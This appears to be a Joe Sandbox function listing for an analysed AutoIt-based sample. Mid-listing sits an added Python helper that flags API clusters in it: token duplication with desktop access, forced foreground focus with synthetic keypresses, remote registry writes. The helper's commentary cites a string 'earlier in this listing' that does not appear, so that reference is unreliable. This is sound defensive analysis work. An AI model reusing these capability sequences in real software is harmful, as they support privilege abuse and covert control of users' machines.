                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                    • Instruction ID: 183562a44d809326b6104d1bbade0ee1806df1d0e688b174f5e09b38e88f6e8e
                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                    • Instruction Fuzzy Hash: EDE08C71A0560CEBDB60CAAC8808BAD77A8EB09324F004A6CFA2ACB290D5308A409614
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?), ref: 015F91BB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                    • Instruction ID: c7dba4a029a80f19b1b55c33b857e7013c0d40fc08d835de87f79e7bd395ae99
                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                    • Instruction Fuzzy Hash: 34D0A73090560CEBCB20DFB89C08EDE73A8E704324F00476DFE15C7280D6319940D790
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __wfsopen
                                    • String ID:
                                    • API String ID: 197181222-0
                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                    • Instruction ID: fbad2a94a82745f1a51a3a83aa2d07d8cd6c3153a1e5c4eae0f2d4825a4baa3c
                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                    • Instruction Fuzzy Hash: A2B0927644020C77DE012A86EC02B893B1AAB42B64F408020FB0C18562A673A6A49A8A
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 015FABB1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction ID: 843c2b59f00dce13e5e96acc73dd94f38a5c80d8fcab2dd521b1e33dd8bb8c24
                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction Fuzzy Hash: 41E0E67494010EDFDB00EFB4D54DA9E7FB4FF04301F100565FD05D2281D6309D508A62
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 0090CB37
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0090CB95
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0090CBD6
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0090CC00
                                    • SendMessageW.USER32 ref: 0090CC29
                                    • _wcsncpy.LIBCMT ref: 0090CC95
                                    • GetKeyState.USER32(00000011), ref: 0090CCB6
                                    • GetKeyState.USER32(00000009), ref: 0090CCC3
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0090CCD9
                                    • GetKeyState.USER32(00000010), ref: 0090CCE3
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0090CD0C
                                    • SendMessageW.USER32 ref: 0090CD33
                                    • SendMessageW.USER32(?,00001030,?,0090B348), ref: 0090CE37
                                    • SetCapture.USER32(?), ref: 0090CE69
                                    • ClientToScreen.USER32(?,?), ref: 0090CECE
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0090CEF5
                                    • ReleaseCapture.USER32 ref: 0090CF00
                                    • GetCursorPos.USER32(?), ref: 0090CF3A
                                    • ScreenToClient.USER32(?,?), ref: 0090CF47
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0090CFA3
                                    • SendMessageW.USER32 ref: 0090CFD1
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0090D00E
                                    • SendMessageW.USER32 ref: 0090D03D
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0090D05E
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0090D06D
                                    • GetCursorPos.USER32(?), ref: 0090D08D
                                    • ScreenToClient.USER32(?,?), ref: 0090D09A
                                    • GetParent.USER32(?), ref: 0090D0BA
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0090D123
                                    • SendMessageW.USER32 ref: 0090D154
                                    • ClientToScreen.USER32(?,?), ref: 0090D1B2
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0090D1E2
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0090D20C
                                    • SendMessageW.USER32 ref: 0090D22F
                                    • ClientToScreen.USER32(?,?), ref: 0090D281
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0090D2B5
                                      • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0090D351
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                    • String ID: @GUI_DRAGID$F
                                    • API String ID: 302779176-4164748364
                                    • Opcode ID: 072ab25f4501b08fa6ed7e21ff227a4f311e217776adf9f78644b7754ab68b38
                                    • Instruction ID: 711fb37b491eb9deba0adac05fb5ad82b5189ea6da3158ad33e01729473ed232
                                    • Opcode Fuzzy Hash: 072ab25f4501b08fa6ed7e21ff227a4f311e217776adf9f78644b7754ab68b38
                                    • Instruction Fuzzy Hash: BE429AB4208241AFDB24DF68D844EAABBE9FF49314F140A29F695C72F1C731D941EB52
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove$_memset
                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                    • API String ID: 1357608183-1798697756
                                    • Opcode ID: c8a4adbef2d52a288be933f57dd42e6fb4169d71a1c7654a51455ca3bd0af18b
                                    • Instruction ID: 8498361f28613d2b2ccb2dcd6252b56d847941138a58b183c210960adb8dd02c
                                    • Opcode Fuzzy Hash: c8a4adbef2d52a288be933f57dd42e6fb4169d71a1c7654a51455ca3bd0af18b
                                    • Instruction Fuzzy Hash: 2B939071A04219DBDF24DF98D881BADB7B1FF58714F24826AE945EB381E7709E81CB40
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,?), ref: 008848DF
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008BD665
                                    • IsIconic.USER32(?), ref: 008BD66E
                                    • ShowWindow.USER32(?,00000009), ref: 008BD67B
                                    • SetForegroundWindow.USER32(?), ref: 008BD685
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008BD69B
                                    • GetCurrentThreadId.KERNEL32 ref: 008BD6A2
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 008BD6AE
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 008BD6BF
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 008BD6C7
                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 008BD6CF
                                    • SetForegroundWindow.USER32(?), ref: 008BD6D2
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BD6E7
                                    • keybd_event.USER32(00000012,00000000), ref: 008BD6F2
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BD6FC
                                    • keybd_event.USER32(00000012,00000000), ref: 008BD701
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BD70A
                                    • keybd_event.USER32(00000012,00000000), ref: 008BD70F
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BD719
                                    • keybd_event.USER32(00000012,00000000), ref: 008BD71E
                                    • SetForegroundWindow.USER32(?), ref: 008BD721
                                    • AttachThreadInput.USER32(?,?,00000000), ref: 008BD748
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 4125248594-2988720461
                                    • Opcode ID: f73d75e8af6dd8a56aa2ecbcb39d559b2fbd5f9bf6ec82a42858494d59763c2c
                                    • Instruction ID: 97aa48cf499516cbabbfc81694f3b28d4a46b1727ce33724761c73b43dfdeff4
                                    • Opcode Fuzzy Hash: f73d75e8af6dd8a56aa2ecbcb39d559b2fbd5f9bf6ec82a42858494d59763c2c
                                    • Instruction Fuzzy Hash: 44316071A9431CBEEB306B619C49FBF7F6CEB44B50F104025FA04EA1D1DAB15A01BBA1
                                    APIs
                                      • Part of subcall function 008D87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D882B
                                      • Part of subcall function 008D87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8858
                                      • Part of subcall function 008D87E1: GetLastError.KERNEL32 ref: 008D8865
                                    • _memset.LIBCMT ref: 008D8353
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008D83A5
                                    • CloseHandle.KERNEL32(?), ref: 008D83B6
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008D83CD
                                    • GetProcessWindowStation.USER32 ref: 008D83E6
                                    • SetProcessWindowStation.USER32(00000000), ref: 008D83F0
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008D840A
                                      • Part of subcall function 008D81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008D8309), ref: 008D81E0
                                      • Part of subcall function 008D81CB: CloseHandle.KERNEL32(?,?,008D8309), ref: 008D81F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                    • String ID: $default$winsta0
                                    • API String ID: 2063423040-1027155976
                                    • Opcode ID: 8030362ecd9bf28c57fd1cfec1fc76a6084a732c216c349f7cbef2489fdd23fe
                                    • Instruction ID: f2ed6043f29f22e0ddfbf62b42400734dec5896baba67b4e82ebe56a7b4bef7f
                                    • Opcode Fuzzy Hash: 8030362ecd9bf28c57fd1cfec1fc76a6084a732c216c349f7cbef2489fdd23fe
                                    • Instruction Fuzzy Hash: 81814BB1910209EFDF219FA8DC45AEEBBB9FF04304F14426AF914E6261DB319E15DB21
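The two entries above are the kind of API clusters worth pulling out of a listing this long: the AttachThreadInput / keybd_event(0x12, Alt) / SetForegroundWindow sequence that forces a window to the foreground, and the DuplicateTokenEx / OpenWindowStationW("winsta0") / OpenDesktopW("default") sequence that prepares a duplicated token for use on the interactive desktop. The Python below is an added example written for this page; it is not Joe Sandbox code and not code from the analysed sample. It parses function entries in the shape shown above ("• Api.MODULE(args), ref: ADDR" lines, each entry closed by its "Instruction Fuzzy Hash" line) and flags entries whose API set matches a rule. The rules and their descriptions are the editor's own triage heuristics, not Joe Sandbox signatures; the sample input is a trimmed excerpt built from the entries above.

```python
"""Triage helper for Joe Sandbox function listings (added example, not Joe Sandbox
code). Parses '• Api.MODULE(args), ref: ADDR' lines into per-function entries and
flags API clusters. RULES are the editor's heuristics, not sandbox signatures."""
import re
from dataclasses import dataclass, field

# One API line, with or without the "Part of subcall function ADDR:" prefix.
_API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# Identification lines we keep; "API String ID", "Opcode ID" etc. do not match.
_KV_LINE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID|Source File):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: str
    ref: str            # call-site address as printed in the listing
    via_subcall: bool   # True for "Part of subcall function" lines


@dataclass
class Entry:
    apis: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    source_file: str = ""


def parse_entries(text):
    """One Entry per function; the 'Instruction Fuzzy Hash' line closes an entry."""
    entries, cur = [], Entry()
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if m:
            cur.apis.append(ApiCall(m["api"], m["module"], (m["args"] or "").strip(),
                                    m["ref"].upper(), m["sub"] is not None))
            continue
        m = _KV_LINE.match(line)
        if m:
            val = m["val"].strip()
            if m["key"] == "API ID":
                cur.api_id = val
            elif m["key"] == "String ID":
                cur.string_id = val
            else:
                cur.source_file = val
            continue
        if "Instruction Fuzzy Hash:" in line:
            if cur.apis or cur.api_id:
                entries.append(cur)
            cur = Entry()
    return entries


# Every API in a rule must appear in the same function entry (subcalls count).
RULES = {
    "token duplication + winsta0/default desktop access (run-as style)":
        {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"},
    "forced foreground focus via AttachThreadInput + synthetic Alt (VK 0x12) keypress":
        {"AttachThreadInput", "keybd_event", "SetForegroundWindow"},
    "file attribute rewrite during a directory walk":
        {"FindFirstFileW", "SetFileAttributesW"},
}


def flag_entry(entry):
    names = {c.api for c in entry.apis}
    return [desc for desc, needed in RULES.items() if needed <= names]


def triage(text):
    """[(api_id, source_file, [rule descriptions])] for every entry that hits a rule."""
    return [(e.api_id, e.source_file, hits)
            for e in parse_entries(text) if (hits := flag_entry(e))]


# Trimmed excerpt built from the entries above, reduced to the lines the parser uses.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 008D8353
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008D83A5
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008D83CD
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008D840A
  • Part of subcall function 008D81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008D8309), ref: 008D81E0
Memory Dump Source
• Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess
• String ID: $default$winsta0
• API String ID: 2063423040-1027155976
• Instruction Fuzzy Hash: 81814BB1910209EFDF219FA8DC45AEEBBB9FF04304F14426AF914E6261DB319E15DB21
APIs
• GetCurrentThreadId.KERNEL32 ref: 008BD6A2
• AttachThreadInput.USER32(?,00000000,00000001), ref: 008BD6BF
• MapVirtualKeyW.USER32(00000012,00000000), ref: 008BD6E7
• keybd_event.USER32(00000012,00000000), ref: 008BD6F2
• SetForegroundWindow.USER32(?), ref: 008BD721
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event
• String ID: Shell_TrayWnd
• Instruction Fuzzy Hash: 44316071A9431CBEEB306B619C49FBF7F6CEB44B50F104025FA04EA1D1DAB15A01BBA1
APIs
• Sleep.KERNELBASE(000001F4), ref: 015FABB1
• Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
• API ID: Sleep
• String ID:
• Instruction Fuzzy Hash: 41E0E67494010EDFDB00EFB4D54DA9E7FB4FF04301F100565FD05D2281D6309D508A62
"""

if __name__ == "__main__":
    for api_id, src, hits in triage(SAMPLE):
        print(api_id, "@", src.split(",")[0])
        for h in hits:
            print("   ", h)
```

Paste the full "Functions" section of a report into `triage()` and only the entries that hit a rule come back, with the memory dump they were lifted from so the address can be found again in the dump. Keep in mind that a hit is capability, not intent: the same API clusters appear in the runtime of any compiled AutoIt binary (note the ">>>AUTOIT NO CMDEXECUTE<<<" string passed to FreeLibrary earlier in this listing), so a match is a prompt to read the call site, not a verdict on the sample.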
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 008EC78D
                                    • FindClose.KERNEL32(00000000), ref: 008EC7E1
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008EC806
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008EC81D
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 008EC844
                                    • __swprintf.LIBCMT ref: 008EC890
                                    • __swprintf.LIBCMT ref: 008EC8D3
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    • __swprintf.LIBCMT ref: 008EC927
                                      • Part of subcall function 008A3698: __woutput_l.LIBCMT ref: 008A36F1
                                    • __swprintf.LIBCMT ref: 008EC975
                                      • Part of subcall function 008A3698: __flsbuf.LIBCMT ref: 008A3713
                                      • Part of subcall function 008A3698: __flsbuf.LIBCMT ref: 008A372B
                                    • __swprintf.LIBCMT ref: 008EC9C4
                                    • __swprintf.LIBCMT ref: 008ECA13
                                    • __swprintf.LIBCMT ref: 008ECA62
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                    • API String ID: 3953360268-2428617273
                                    • Opcode ID: 7f376d6f45239211f09b671e10727129d46b4ca49ba0a181e0679a2194779066
                                    • Instruction ID: fcd790db4838277b340ec6684ad28c41df5a5b510f843b55f77ffe0f7f5e69cd
                                    • Opcode Fuzzy Hash: 7f376d6f45239211f09b671e10727129d46b4ca49ba0a181e0679a2194779066
                                    • Instruction Fuzzy Hash: 63A109B2408345ABD750FBA8C886DAFB7ECFF95704F440929F595C6191EA30DA09CB63
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 008EEFB6
                                    • _wcscmp.LIBCMT ref: 008EEFCB
                                    • _wcscmp.LIBCMT ref: 008EEFE2
                                    • GetFileAttributesW.KERNEL32(?), ref: 008EEFF4
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 008EF00E
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 008EF026
                                    • FindClose.KERNEL32(00000000), ref: 008EF031
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 008EF04D
                                    • _wcscmp.LIBCMT ref: 008EF074
                                    • _wcscmp.LIBCMT ref: 008EF08B
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EF09D
                                    • SetCurrentDirectoryW.KERNEL32(00938920), ref: 008EF0BB
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 008EF0C5
                                    • FindClose.KERNEL32(00000000), ref: 008EF0D2
                                    • FindClose.KERNEL32(00000000), ref: 008EF0E4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    • API String ID: 1803514871-438819550
                                    • Opcode ID: 1e11911a47d7c787e43b57f39fc63fc907969ebbc71842ada6ed35a94fc47456
                                    • Instruction ID: 0e6c6654b9ff3722485bf14010fc182287cc570abc76d71479e97000d058d4da
                                    • Opcode Fuzzy Hash: 1e11911a47d7c787e43b57f39fc63fc907969ebbc71842ada6ed35a94fc47456
                                    • Instruction Fuzzy Hash: 8731C1325056486FDB24ABA9DC58AEE77ACFF4A360F1001B5F914D2092DB70DB44DF61
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900953
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0090F910,00000000,?,00000000,?,?), ref: 009009C1
                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00900A09
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00900A92
                                    • RegCloseKey.ADVAPI32(?), ref: 00900DB2
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00900DBF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Close$ConnectCreateRegistryValue
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 536824911-966354055
                                    • Opcode ID: 85940f605a141d4d17c0ff02f75f33435971def5bf3fdab82f43b8813172bd10
                                    • Instruction ID: 6b6fa6dd0ef667787f2380458bf1e89bf39521fb1580986be1a8ab52c12e5680
                                    • Opcode Fuzzy Hash: 85940f605a141d4d17c0ff02f75f33435971def5bf3fdab82f43b8813172bd10
                                    • Instruction Fuzzy Hash: 5A023A756006129FDB14EF18C851E2AB7E5FF89314F048568F89ADB7A2DB30ED41CB82
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • DragQueryPoint.SHELL32(?,?), ref: 0090C627
                                      • Part of subcall function 0090AB37: ClientToScreen.USER32(?,?), ref: 0090AB60
                                      • Part of subcall function 0090AB37: GetWindowRect.USER32(?,?), ref: 0090ABD6
                                      • Part of subcall function 0090AB37: PtInRect.USER32(?,?,0090C014), ref: 0090ABE6
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0090C690
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0090C69B
